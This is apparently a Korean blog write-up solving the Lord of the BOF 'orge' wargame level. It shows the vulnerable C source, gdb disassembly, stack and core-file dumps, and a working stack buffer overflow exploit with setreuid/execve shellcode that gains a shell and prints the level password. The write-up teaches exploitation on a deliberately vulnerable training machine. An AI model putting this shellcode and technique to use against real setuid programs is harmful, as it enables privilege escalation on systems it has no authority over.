시작
안녕하세요!
이번엔 darkelf를 풀어보았는데..
core 파일을 처음으로 뜯어본 것도 있고, 이런저런 생각을 많이 했던 문제였습니다.
시작해보죠.
Write UP
[darkelf@localhost darkelf]$ ll
total 20
-rwsr-sr-x 1 orge orge 12700 Mar 1 2010 orge
-rw-r--r-- 1 root root 800 Mar 29 2010 orge.c
[darkelf@localhost darkelf]$
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include
#include
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
argv[0]의 길이를 검사하는 구문이 추가되었네요.
/tmp 밑에 orge 디렉터리를 만든 후 실행 파일의 이름을 a * 67 로 바꿔서 복사했습니다.
[darkelf@localhost /tmp]$ mkdir orge
[darkelf@localhost /tmp]$ cd ~
[darkelf@localhost darkelf]$ cp orge /tmp/orge/`python -c 'print "a" * 67'`
[darkelf@localhost darkelf]$ cd /tmp/orge
[darkelf@localhost orge]$ ll
total 14
-rwsr-sr-x 1 darkelf darkelf 12700 May 6 08:51 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[darkelf@localhost orge]$ /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 1234
stack is still your friend.
실행시켰을 때 argv[0] error 가 출력되지 않고 넘어가는걸 보니 잘 피해졌네요.
gdb로 뜯어봅시다!
[darkelf@localhost orge]$ gdb -q /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 : push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048690
0x8048511 <main+17>: call 0x8048410
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048526 <main+38>: mov %edx,DWORD PTR [%eax]
0x8048528 <main+40>: push %edx
0x8048529 <main+41>: call 0x80483f0
0x804852e <main+46>: add %esp,4
0x8048531 <main+49>: mov %eax,%eax
0x8048533 <main+51>: cmp %eax,77
0x8048536 <main+54>: je 0x8048550 <main+80>
0x8048538 <main+56>: push 0x804869c
0x804853d <main+61>: call 0x8048410
0x8048542 <main+66>: add %esp,4
0x8048545 <main+69>: push 0
0x8048547 <main+71>: call 0x8048420
0x804854c <main+76>: add %esp,4
0x804854f <main+79>: nop
0x8048550 <main+80>: nop
0x8048551 <main+81>: mov DWORD PTR [%ebp-44],0x0
0x8048558 <main+88>: mov %eax,DWORD PTR [%ebp-44]
0x804855b <main+91>: lea %edx,[%eax*4]
0x8048562 <main+98>: mov %eax,%ds:0x80497d4
0x8048567 <main+103>: cmp DWORD PTR [%eax+%edx],0
0x804856b <main+107>: jne 0x8048570 <main+112>
0x804856d <main+109>: jmp 0x80485b0 <main+176>
0x804856f <main+111>: nop
0x8048570 <main+112>: mov %eax,DWORD PTR [%ebp-44]
0x8048573 <main+115>: lea %edx,[%eax*4]
0x804857a <main+122>: mov %eax,%ds:0x80497d4
0x804857f <main+127>: mov %edx,DWORD PTR [%eax+%edx]
0x8048582 <main+130>: push %edx
0x8048583 <main+131>: call 0x80483f0
0x8048588 <main+136>: add %esp,4
0x804858b <main+139>: mov %eax,%eax
0x804858d <main+141>: push %eax
0x804858e <main+142>: push 0
0x8048590 <main+144>: mov %eax,DWORD PTR [%ebp-44]
0x8048593 <main+147>: lea %edx,[%eax*4]
0x804859a <main+154>: mov %eax,%ds:0x80497d4
0x804859f <main+159>: mov %edx,DWORD PTR [%eax+%edx]
0x80485a2 <main+162>: push %edx
0x80485a3 <main+163>: call 0x8048430
0x80485a8 <main+168>: add %esp,12
0x80485ab <main+171>: inc DWORD PTR [%ebp-44]
---Type to continue, or q to quit---
0x80485ae <main+174>: jmp 0x8048558 <main+88>
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: add %edx,47
0x80485bb <main+187>: cmp BYTE PTR [%edx],0xbf
0x80485be <main+190>: je 0x80485d7 <main+215>
0x80485c0 <main+192>: push 0x80486ab
0x80485c5 <main+197>: call 0x8048410
0x80485ca <main+202>: add %esp,4
0x80485cd <main+205>: push 0
0x80485cf <main+207>: call 0x8048420
0x80485d4 <main+212>: add %esp,4
0x80485d7 <main+215>: mov %eax,DWORD PTR [%ebp+12]
0x80485da <main+218>: add %eax,4
0x80485dd <main+221>: mov %edx,DWORD PTR [%eax]
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0
0x80485e5 <main+229>: add %esp,4
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp %eax,48
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push 0x80486c8
0x80485f4 <main+244>: call 0x8048410
0x80485f9 <main+249>: add %esp,4
0x80485fc <main+252>: push 0
0x80485fe <main+254>: call 0x8048420
0x8048603 <main+259>: add %esp,4
0x8048606 <main+262>: mov %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>: add %eax,4
0x804860c <main+268>: mov %edx,DWORD PTR [%eax]
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea %eax,[%ebp-40]
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440
0x8048618 <main+280>: add %esp,8
0x804861b <main+283>: lea %eax,[%ebp-40]
0x804861e <main+286>: push %eax
0x804861f <main+287>: push 0x80486df
0x8048624 <main+292>: call 0x8048410
0x8048629 <main+297>: add %esp,8
0x804862c <main+300>: push 40
0x804862e <main+302>: push 0
0x8048630 <main+304>: lea %eax,[%ebp-40]
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430
0x8048639 <main+313>: add %esp,12
0x804863c <main+316>: leave
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
(gdb) b *main+280
Breakpoint 1 at 0x8048618
strcpy 함수 이후 BP를 잡아주었습니다.
이전 문제와 동일하게 argv[1]엔 버퍼와 SFP, RET를 채우고 argv[2]에 nop과 쉘코드를 저장하겠습니다.
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf"'` `python -c 'print "\x90" * 100 + "CCCC"'`
Starting program: /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "A" * 44 + "BBB" + "\xbf"'` `python -c 'print "\x90" * 100 + "CCCC"'`
Breakpoint 1, 0x8048618 in main ()
(gdb) x/200wx $esp
0xbffff9e4: 0xbffff9f0 0xbffffbac 0x00000014 0x41414141
0xbffff9f4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffa04: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffa14: 0x41414141 0x41414141 0xbf424242 0x00000000
0xbffffa24: 0xbffffa64 0xbffffa74 0x40013868 0x00000003
0xbffffa34: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa44: 0x00000003 0xbffffa64 0x08048390 0x0804866c
0xbffffa54: 0x4000ae60 0xbffffa5c 0x40013e90 0x00000003
0xbffffa64: 0xbffffb5e 0xbffffbac 0xbffffbdd 0x00000000
0xbffffa74: 0xbffffc46 0xbffffc54 0xbffffc73 0xbffffc95
0xbffffa84: 0xbffffca2 0xbffffe65 0xbffffe84 0xbffffea1
0xbffffa94: 0xbffffeb6 0xbffffed5 0xbffffee0 0xbffffef0
0xbffffaa4: 0xbffffef8 0xbfffff09 0xbfffff13 0xbfffff21
0xbffffab4: 0xbfffff32 0xbfffff40 0xbfffff4b 0xbfffff5e
0xbffffac4: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffad4: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffae4: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffaf4: 0x00000000 0x00000009 0x08048450 0x0000000b
0xbffffb04: 0x000001fa 0x0000000c 0x000001fa 0x0000000d
0xbffffb14: 0x000001fa 0x0000000e 0x000001fa 0x00000010
0xbffffb24: 0x0f8bfbff 0x0000000f 0xbffffb59 0x00000000
0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb54: 0x00000000 0x38366900 0x742f0036 0x6f2f706d
0xbffffb64: 0x2f656772 0x61616161 0x61616161 0x61616161
0xbffffb74: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb84: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb94: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffba4: 0x61616161 0x00616161 0x41414141 0x41414141
0xbffffbb4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbc4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbd4: 0x41414141 0xbf424242 0x90909000 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc34: 0x90909090 0x90909090 0x90909090 0x43434390
0xbffffc44: 0x00000043 0x00000000 0x00000000 0x00000000
0xbffffc54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
주소로는 0xbffffbf4를 사용했습니다.
[darkelf@localhost orge]$ /tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "A" * 44 + "\xf4\xfb\xff\xbf"'` `python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒
Segmentation fault (core dumped)
짠!! 실패!!
여기서 진짜 뭐가 문제인지 모르겠어서 삽질 한참 했습니다..
왜 core라는 좋은 녀석을 몰랐는지 ㅠㅠㅠ
프로그램은 죽어서 core를 남긴다 라는 말이 괜히 있는게 아니었어요.. 진짜 짱편함
처음으로 core를 까보겠습니다. 두근두근
gdb -q [file] [core] 또는 gdb -q -c [core]
[darkelf@localhost orge]$ gdb -q -c core
Core was generated by `/tmp/orge/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa A'.
Program terminated with signal 11, Segmentation fault.
#0 0xbfffffb3 in ?? ()
(gdb) x/200wx $esp
0xbffff9a0: 0x00000000 0xbffff9e4 0xbffff9f4 0x40013868
0xbffff9b0: 0x00000003 0x08048450 0x00000000 0x08048471
0xbffff9c0: 0x08048500 0x00000003 0xbffff9e4 0x08048390
0xbffff9d0: 0x0804866c 0x4000ae60 0xbffff9dc 0x40013e90
0xbffff9e0: 0x00000003 0xbffffad7 0xbffffb25 0xbffffb56
0xbffff9f0: 0x00000000 0xbffffbea 0xbffffbf8 0xbffffc17
0xbffffa00: 0xbffffc39 0xbffffc46 0xbffffe09 0xbffffe28
0xbffffa10: 0xbffffe45 0xbffffe5a 0xbffffe79 0xbffffe84
0xbffffa20: 0xbffffe94 0xbffffe9c 0xbffffead 0xbffffeb7
0xbffffa30: 0xbffffec5 0xbffffed6 0xbffffee4 0xbffffeef
0xbffffa40: 0xbfffff02 0xbfffff52 0xbfffffa2 0x00000000
0xbffffa50: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffa60: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffa70: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffa80: 0x00000009 0x08048450 0x0000000b 0x000001fa
0xbffffa90: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbffffaa0: 0x0000000e 0x000001fa 0x00000010 0x0f8bfbff
0xbffffab0: 0x0000000f 0xbffffad2 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffad0: 0x36690000 0x2f003638 0x2f706d74 0x6567726f
0xbffffae0: 0x6161612f 0x61616161 0x61616161 0x61616161
0xbffffaf0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb00: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb10: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb20: 0x61616161 0x41414100 0x41414141 0x41414141
0xbffffb30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb40: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb50: 0xfffbf441 0x909000bf 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x90909090 0x90909090 0xc0319090 0x80cd31b0
0xbffffbc0: 0xc189c389 0x46b0c031 0xc03180cd 0x2f2f6850
0xbffffbd0: 0x2f686873 0x896e6962 0x895350e3 0xb0c289e1
0xbffffbe0: 0x3180cd0b 0xcd01b0c0 0x00000080 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000
죽은 프로그램의 core를 뒤져보니 nop이 있는 주소가 실제론 0xbffffb70라는 것을 확인할 수 있었습니다.
페이로드를 수정해서 쉘을 따러 갑시다!
원본 파일을 심볼릭 링크로 걸어서 공격해야 해요!!
[darkelf@localhost orge]$ ln -s ~/orge /tmp/orge/`python -c 'print "b" * 67'`
[darkelf@localhost orge]$ ll
total 14
-rwsr-sr-x 1 darkelf darkelf 12700 May 6 08:51 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
lrwxrwxrwx 1 darkelf darkelf 18 May 6 08:52 bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb -> /home/darkelf/orge
[darkelf@localhost orge]$ /tmp/orge/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb `python -c 'print "A" * 44 + "\x70\xfb\xff\xbf"'` `python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp▒▒▒
bash$ id
uid=507(orge) gid=506(darkelf) egid=507(orge) groups=506(darkelf)
bash$ /bin/my-pass
euid = 507
timewalker
Exploit!
마무리
호랑이는 죽어서 가죽을 남기고 프로그램은 죽어서 core를 남긴다.
오늘도 하나 배워갑니다. 뿌듯하네요 ㅎㅎ
다음 문제에서 뵙겠습니다 :D
'CTF_Write_UP > LOB' 카테고리의 다른 글
| [LOB] troll (0) | 2019.07.04 |
|---|---|
| [LOB] orge (0) | 2019.05.09 |
| [LOB] wolfman (0) | 2019.05.09 |
| [LOB] orc (0) | 2019.05.09 |
| [LOB] goblin (0) | 2019.05.08 |